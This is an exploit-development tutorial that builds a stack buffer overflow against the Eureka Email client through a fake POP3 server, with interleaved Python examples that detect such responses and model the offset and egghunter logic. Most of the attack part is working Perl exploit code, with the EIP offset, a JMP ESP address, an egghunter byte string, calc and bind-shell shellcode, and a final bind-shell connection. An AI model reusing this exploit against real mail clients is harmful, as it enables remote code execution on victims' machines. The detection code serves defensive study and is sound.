In a classic stack-based buffer overflow, the buffer is big enough to hold the shellcode.
But what happens if, after the overwrite, there is not enough consecutive memory available for the shellcode to fit in?
This vulnerability is triggered when the client connects to a POP3 server. If that POP3 server sends a long / specially crafted "-ERR" response back to the client, the client crashes and arbitrary code can be executed.
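The defender's view of the response described above, as an added example in Python (not code from this post or from Eureka Email): RFC 1939 limits a POP3 response line to 512 octets including the terminating CRLF, so a client, a mail proxy or a network sensor can reject or flag an oversized "-ERR"/"+OK" line before a parser ever touches it. The checker also flags non-printable bytes, a run of 0x90 bytes and a 4-byte tag written twice in a row, which is the shape of the egghunter marker used later in this post. The sample lines and the thresholds are constructed for the example.

```python
# Added example (Python, not from the original post): a defender-side check
# for POP3 server responses. RFC 1939 limits a response line to 512 octets
# including the CRLF; the sample lines below are constructed for this example.

MAX_RESPONSE = 512          # RFC 1939, section 3
NOP_RUN_ALERT = 8           # constructed threshold for a run of 0x90 bytes


def longest_run(data: bytes, byte: int) -> int:
    """Length of the longest run of `byte` in `data`."""
    best = run = 0
    for b in data:
        run = run + 1 if b == byte else 0
        best = max(best, run)
    return best


def find_egg(data: bytes):
    """Return a 4-byte sequence that immediately repeats itself (a tag of the
    form XXXXXXXX, like the w00tw00t marker an egghunter looks for), or None.
    Runs of a single repeated byte are ignored so a NOP sled does not count."""
    for i in range(len(data) - 7):
        tag = data[i:i + 4]
        if tag == data[i + 4:i + 8] and len(set(tag)) > 1:
            return tag
    return None


def check_pop3_response(line: bytes) -> list:
    """Return a list of findings for one server response line (empty = clean)."""
    findings = []
    if not (line.startswith(b"+OK") or line.startswith(b"-ERR")):
        findings.append("missing +OK/-ERR status indicator")
    if len(line) > MAX_RESPONSE:
        findings.append(f"{len(line)} octets exceeds the RFC 1939 limit of {MAX_RESPONSE}")
    if any(b >= 0x80 or (b < 0x20 and b not in b"\r\n\t") for b in line):
        findings.append("non-printable bytes in a text response")
    nops = longest_run(line, 0x90)
    if nops >= NOP_RUN_ALERT:
        findings.append(f"run of {nops} 0x90 bytes (NOP sled?)")
    egg = find_egg(line)
    if egg is not None:
        findings.append(f"repeated 4-byte tag {egg!r} (egghunter marker?)")
    return findings


# Constructed samples: two ordinary responses and one shaped like the
# oversized "-ERR" line this post builds (tag, NOPs, then filler).
BENIGN = [
    b"+OK 2 messages (320 octets)\r\n",
    b"-ERR [AUTH] Invalid login\r\n",
]
CRAFTED = b"-ERR " + b"w00tw00t" + b"\x90" * 16 + b"A" * 600 + b"\r\n"


def scan(lines) -> dict:
    """Map each response to its findings, keeping only flagged lines."""
    return {line: f for line in lines if (f := check_pop3_response(line))}


if __name__ == "__main__":
    for line, findings in scan(BENIGN + [CRAFTED]).items():
        print(line[:24], findings)
```

The length check alone would have stopped the crash this post reproduces, since every payload in it is far longer than 512 octets; the other three checks are heuristics and should be tuned before they drive blocking rather than alerting.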
Let's build the exploit from scratch on XP SP3 English (VirtualBox).
We'll use a few simple lines of Perl to set up a fake POP3 server that sends a 2000-byte string (a Metasploit pattern) back to the client.
First of all, run Eureka Email.
Set the account server:
Create a Metasploit pattern of 2000 characters from within Immunity using the following command:
#pattern_create 2000
Then attach OllyDbg to Eureka Email, as shown:
use Socket;
# Metasploit pattern of 2000 bytes (paste the full pattern_create output; truncated here)
my $junk = "Aa0Aa1Aa2Aa3A . .";
my $payload=$junk;
# set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
  print "[+] Client connected, sending evil payload\n";
  # keep answering with the crafted -ERR line until the client goes away
  while(1)
  {
    print CLIENT "-ERR ".$payload."\n";
    print " -> Sent ".length($payload)." bytes\n";
  }
}
close CLIENT;
print "[+] Connection closed\n";
Run the fuzzer:
root@bt:/media/Document/IS2C-febri/Day6/egghunter# perl cobaegg.pl
[+] Listening on tcp port 110 [POP3]...
[+] Configure Eureka Mail Client to connect to this host
Then, in Eureka Email, choose the File window and Send and Receive emails.
Look at the OllyDbg log and registers: "Access violation when executing [41377841]"
The registers look like this:
From the information shown above, EIP is 41377841 and ESP points at x8Ax9Ay.
Now we look up the pattern offsets of the EIP and ESP values, with the following commands:
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 41377841
711
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb x8Ax9A
715
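As an added example (Python, not part of the original post and not Metasploit's own code), here is a re-implementation of pattern_create and pattern_offset that reproduces the two offsets above. A 32-bit register value such as 41377841 is a little-endian dword, so its bytes are reversed to "Ax7A" before searching, while a string copied from the stack dump like x8Ax9A is searched as-is. The 4-byte gap between the results (715 - 711) is the reason a JMP ESP works later in the post: ESP points at the data that follows the four bytes which landed in EIP.

```python
import string
from itertools import islice
from typing import Optional

# Added example: a Python re-implementation of Metasploit's cyclic pattern
# tools (pattern_create / pattern_offset). Not code from the original post.


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the pattern Aa0Aa1Aa2...Zz9.

    Each 3-character unit is <upper><lower><digit>, so every 4-byte window
    is unique within the first 26*26*10*3 = 20280 bytes.
    """
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern repeats beyond 20280 bytes")
    units = (u + l + d
             for u in string.ascii_uppercase
             for l in string.ascii_lowercase
             for d in string.digits)
    needed = length // 3 + 1                    # enough units to cover length
    return "".join(islice(units, needed))[:length]


def pattern_offset(value: str, length: int = 2000) -> Optional[int]:
    """Offset of `value` inside the pattern, or None if it is not present.

    `value` is either text copied from a register dump (e.g. "x8Ax9A") or
    the 8 hex digits a debugger shows for a 32-bit register (e.g. "41377841").
    A register holds a little-endian dword, so the hex bytes are reversed to
    recover their order in memory: 41 37 78 41 -> bytes 41 78 37 41 -> "Ax7A".
    Like the Metasploit tool, an 8-character value that happens to be all hex
    digits is treated as a register value first.
    """
    needle = value
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        try:
            needle = bytes.fromhex(value)[::-1].decode("ascii")
        except UnicodeDecodeError:
            needle = value
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    # The two values from the OllyDbg crash above.
    print("EIP 41377841 ->", pattern_offset("41377841"))   # 711
    print("ESP x8Ax9A   ->", pattern_offset("x8Ax9A"))     # 715
```

Because the pattern only stays unique for 20280 bytes, a pattern longer than that (or a crash that lands in a copy of the pattern) gives ambiguous offsets; the length guard makes that failure explicit instead of silently returning the first match.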
Then modify your fuzzer:
use Socket;
# 711 bytes to reach EIP, 4 bytes that land in EIP, then 2000 bytes that ESP will point at
my $junkeip = "\x41" x 711;
my $junkesp = "\x42" x 4;
my $junkcrash = "\x43" x 2000;
my $payload=$junkeip.$junkesp.$junkcrash;
# set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
  print "[+] Client connected, sending evil payload\n";
  while(1)
  {
    print CLIENT "-ERR ".$payload."\n";
    print " -> Sent ".length($payload)." bytes\n";
  }
}
close CLIENT;
print "[+] Connection closed\n";
In the result we can see that EIP holds our four 0x42 bytes and ESP points at the 0x43 bytes that follow.
Next, search for a module containing a JMP ESP; the one used here is at 7E429353 (written little-endian as \x53\x93\x42\x7E below).
Set a breakpoint on it and step through to test. The result is as expected:
For the next step we try a calc.exe payload,
and modify the fuzzer:
use Socket;
# payload: 711 bytes to EIP, JMP ESP address, 8 NOPs, then the calc.exe shellcode
my $junkeip = "\x41" x 711;
my $junkesp = "\x53\x93\x42\x7E"; # JMP ESP at 0x7E429353, little-endian
my $junkloncat = "\x90" x 8;
my $junkcrash = "\xda\xdd\x2b\xc9\xd9 . ."; # calc.exe shellcode (truncated on the page)
my $payload=$junkeip.$junkesp.$junkloncat.$junkcrash;
# set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
  print "[+] Client connected, sending evil payload\n";
  while(1)
  {
    print CLIENT "-ERR ".$payload."\n";
    print " -> Sent ".length($payload)." bytes\n";
  }
}
close CLIENT;
print "[+] Connection closed\n";
Run Eureka Email without OllyDbg, then run the fuzzer.
Now choose the File window - Send and Receive emails, and look at the result: the calculator pops up.
After succeeding with the calculator, let's try a bind shell payload.
The bind shell (344 bytes) does not fit in the 711 bytes before EIP together with everything else, so it goes in front, tagged with w00tw00t, and a small egghunter placed after the JMP ESP searches memory for that tag. Modify your fuzzer with the bind shell payload, like this:
use Socket;
# payload: egg tag + bind shell (352 bytes), 359 NOPs to reach EIP (711 in total),
# JMP ESP address, 8 NOPs, then the egghunter
my $junkeip = "w00tw00t".
"\x31\xc9\xb1\x51\xba . ."; # bind shell, size 344 + w00tw00t = 352 (shellcode truncated on the page)
my $junktambah = "\x90" x 359; # padding: 352 + 359 = 711
my $junkesp = "\x53\x93\x42\x7E"; # JMP ESP at 0x7E429353, little-endian
my $junkloncat = "\x90" x 8;
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". # this is the marker/tag: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
my $payload=$junkeip.$junktambah.$junkesp.$junkloncat.$egghunter;
# set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
  print "[+] Client connected, sending evil payload\n";
  while(1)
  {
    print CLIENT "-ERR ".$payload."\n";
    print " -> Sent ".length($payload)." bytes\n";
  }
}
close CLIENT;
print "[+] Connection closed\n";
Note: the bind shell is only 344 bytes, while 711 bytes are needed to reach EIP.
So we need a new variable to reach EIP: my $junktambah = "\x90" x 359;
That gives 344 + w00tw00t (8) + 359 = 711.
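To make the final layout understandable, here is a model of the search the 32-byte egghunter above performs, written as an added Python example (it is not the post's code and does not execute anything). The real hunter walks memory one byte at a time, uses a system call to learn whether an address is readable and jumps to the next 4096-byte page when it is not, compares 8 bytes against the tag written twice, and finally jumps to the byte after the egg. Memory is modelled as a dict of page number to page contents; pages absent from the dict play the role of unmapped memory, and the page numbers, offsets and the stand-in "shellcode" are constructed values.

```python
# Added example (Python, not the post's code): a model of the egghunter's
# search over a constructed address space. Pages missing from the dict are
# "unmapped"; the hunter skips them the way the real one does on a fault.

PAGE = 0x1000
TAG = b"w00t"            # the marker from the post
EGG = TAG + TAG          # the hunter looks for the tag twice in a row

# Bytes the hunter carries: "mov eax, 'w00t'" followed by "mov edi, edx".
# Only one copy of the tag is present, so the hunter never matches itself.
HUNTER_FRAGMENT = b"\xb8" + TAG + b"\x8b\xfa"

HUNTER_PAGE, HUNTER_OFF = 0x10, 0x100        # constructed placement
EGG_PAGE, EGG_OFF = 0x30, 0x200              # constructed placement
SHELLCODE_STANDIN = b"SHELLCODE-STAND-IN"    # constructed, not real code


def build_space() -> dict:
    """Constructed address space: hunter on one page, egg + code on another,
    everything in between unmapped."""
    hunter = bytearray(PAGE)
    hunter[HUNTER_OFF:HUNTER_OFF + len(HUNTER_FRAGMENT)] = HUNTER_FRAGMENT
    egg_page = bytearray(b"\x90" * PAGE)     # NOP padding like $junktambah
    blob = EGG + SHELLCODE_STANDIN
    egg_page[EGG_OFF:EGG_OFF + len(blob)] = blob
    return {HUNTER_PAGE: bytes(hunter), EGG_PAGE: bytes(egg_page)}


def read8(space: dict, addr: int):
    """8 bytes at addr, or None if any of them lies on an unmapped page."""
    out = b""
    while len(out) < 8:
        page, off = divmod(addr + len(out), PAGE)
        if page not in space:
            return None
        out += space[page][off:off + 8 - len(out)]
    return out


def hunt(space: dict, start: int = 0, end: int = 0x40 * PAGE):
    """Address the hunter would jump to (just past the egg), or None."""
    addr = start
    while addr < end:
        window = read8(space, addr)
        if window is None:
            # access violation: "or dx, 0xfff; inc edx" -> start of next page
            addr = (addr // PAGE + 1) * PAGE
            continue
        if window == EGG:
            return addr + len(EGG)       # "jmp edi" lands right after the egg
        addr += 1                        # "inc edx" and compare again
    return None


def code_at(space: dict, addr: int, n: int) -> bytes:
    """Bytes found at addr, i.e. what would run after the hunter's jump."""
    page, off = divmod(addr, PAGE)
    return space[page][off:off + n]


if __name__ == "__main__":
    space = build_space()
    target = hunt(space)
    print(hex(target), code_at(space, target, len(SHELLCODE_STANDIN)))
```

Two points the model makes visible: the tag has to be doubled (w00tw00t) because the hunter's own code holds a single copy of w00t and must not find itself, and the 8-byte compare window is treated as unreadable when it crosses into an unmapped page, which is why the egg must sit entirely inside readable memory.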
Alright, now run Eureka Email without OllyDbg.
Run the fuzzer, then choose File - Send and Receive emails in Eureka Email.
Now let's connect to the bind shell with telnet, like this:
Nice, successful :-)
Good luck!!!